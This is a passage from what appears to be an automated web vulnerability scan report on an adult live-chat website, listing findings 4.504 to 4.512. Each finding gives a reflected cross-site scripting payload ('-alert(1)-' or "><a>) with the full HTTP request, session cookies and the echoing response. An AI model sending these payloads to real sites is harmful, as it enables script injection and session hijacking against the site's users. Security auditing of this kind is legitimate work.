The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1145a'-alert(1)-'9eeece25a26 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /live-sex-chats/cams-aroundthehouse/?1145a'-alert(1)-'9eeece25a26=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:16 GMT
Connection: close
Content-Length: 33767
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/aroundthehouse.aspx&he=imlive.com&ul=/live-sex-chats/cams-aroundthehouse/?1145a'-alert(1)-'9eeece25a26=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined'
...[SNIP]...

4.504. http://imlive.com/live-sex-chats/caught-on-cam/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://imlive.com
Path:	/live-sex-chats/caught-on-cam/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3af4"><a>c33137ced61 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/caught-on-cam/?f3af4"><a>c33137ced61=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:23:56 GMT
Connection: close
Content-Length: 26092
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/live-sex-chats/caught-on-cam/?f3af4"><a>c33137ced61=1');return false;" lang="en-US" hreflang="en-US">
...[SNIP]...

4.505. http://imlive.com/live-sex-chats/caught-on-cam/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://imlive.com
Path:	/live-sex-chats/caught-on-cam/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb9d8'-alert(1)-'484051df056 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /live-sex-chats/caught-on-cam/?cb9d8'-alert(1)-'484051df056=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:19 GMT
Connection: close
Content-Length: 26239
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/caughtoncam.aspx&he=imlive.com&ul=/live-sex-chats/caught-on-cam/?cb9d8'-alert(1)-'484051df056=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined'
...[SNIP]...

4.506. http://imlive.com/live-sex-chats/couple/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://imlive.com
Path:	/live-sex-chats/couple/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7330d'-alert(1)-'69a435aad31 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /live-sex-chats/couple/?7330d'-alert(1)-'69a435aad31=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:21:18 GMT
Connection: close
Content-Length: 116890
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/couple/?7330d'-alert(1)-'69a435aad31=1&qs=cat=1^roomid=12^7330d'-alert(1)-'69a435aad31=1&qs=cat=1^roomid=12^7330d'-alert(1)-'69a435aad31=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eb
...[SNIP]...

4.507. http://imlive.com/live-sex-chats/couple/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://imlive.com
Path:	/live-sex-chats/couple/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f29d6"><a>e94ae201611 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/couple/?f29d6"><a>e94ae201611=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

4.508. http://imlive.com/live-sex-chats/fetish/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://imlive.com
Path:	/live-sex-chats/fetish/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a68a0"><a>c6c73a2ee9a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/fetish/?a68a0"><a>c6c73a2ee9a=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

4.509. http://imlive.com/live-sex-chats/fetish/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://imlive.com
Path:	/live-sex-chats/fetish/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eb492'-alert(1)-'e05d7866c6a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /live-sex-chats/fetish/?eb492'-alert(1)-'e05d7866c6a=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:21:57 GMT
Connection: close
Content-Length: 214380
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/fetish/?eb492'-alert(1)-'e05d7866c6a=1&qs=cat=1^roomid=13^eb492'-alert(1)-'e05d7866c6a=1&qs=cat=1^roomid=13^eb492'-alert(1)-'e05d7866c6a=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eb
...[SNIP]...

4.510. http://imlive.com/live-sex-chats/fetish/categories/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://imlive.com
Path:	/live-sex-chats/fetish/categories/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ceae9'-alert(1)-'1ae32c8a8a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /live-sex-chats/fetish/categories/?ceae9'-alert(1)-'1ae32c8a8a=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:22:27 GMT
Connection: close
Content-Length: 25109
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/fetish_category_sub.aspx&he=imlive.com&ul=/live-sex-chats/fetish/categories/?ceae9'-alert(1)-'1ae32c8a8a=1&qs=roomid=13&qs=roomid=13&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.a
...[SNIP]...

4.511. http://imlive.com/live-sex-chats/fetish/categories/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://imlive.com
Path:	/live-sex-chats/fetish/categories/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4a77"><a>b24d1216ef2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/fetish/categories/?c4a77"><a>b24d1216ef2=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:22:02 GMT
Connection: close
Content-Length: 24983
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/live-sex-chats/fetish/categories/?c4a77"><a>b24d1216ef2=1');return false;" lang="en-US" hreflang="en-US">
...[SNIP]...

4.512. http://imlive.com/live-sex-chats/free-sex-video-for-ipod/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://imlive.com
Path:	/live-sex-chats/free-sex-video-for-ipod/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5370e"><a>3222e16e08d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

